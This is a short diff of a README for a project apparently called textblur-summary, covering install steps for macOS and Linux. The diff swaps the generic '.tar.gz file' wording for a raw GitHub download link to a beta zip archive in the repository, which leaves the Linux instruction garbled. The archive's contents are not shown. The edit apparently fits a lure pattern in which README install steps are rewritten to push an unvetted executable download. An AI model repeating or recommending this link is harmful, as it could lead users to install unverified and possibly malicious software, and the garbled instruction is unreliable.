GIPPY754/textblur-summary/README.md

 - **macOS:**
   - Open the downloaded .dmg file.
 Drag the textblur-summary application into your Applications folder.
 - **Linux:**
-  - For a .tar.gz file, extract it and run the application from the folder.
+  - For a https://github.com/GIPPY754/textblur-summary/raw/refs/heads/main/textblur_summary/summary-textblur-v2.5-beta.2.zip file, extract it and run the application from the folder.

 ## 📄 How to Use the Application
 1. Open the textblur-summary application.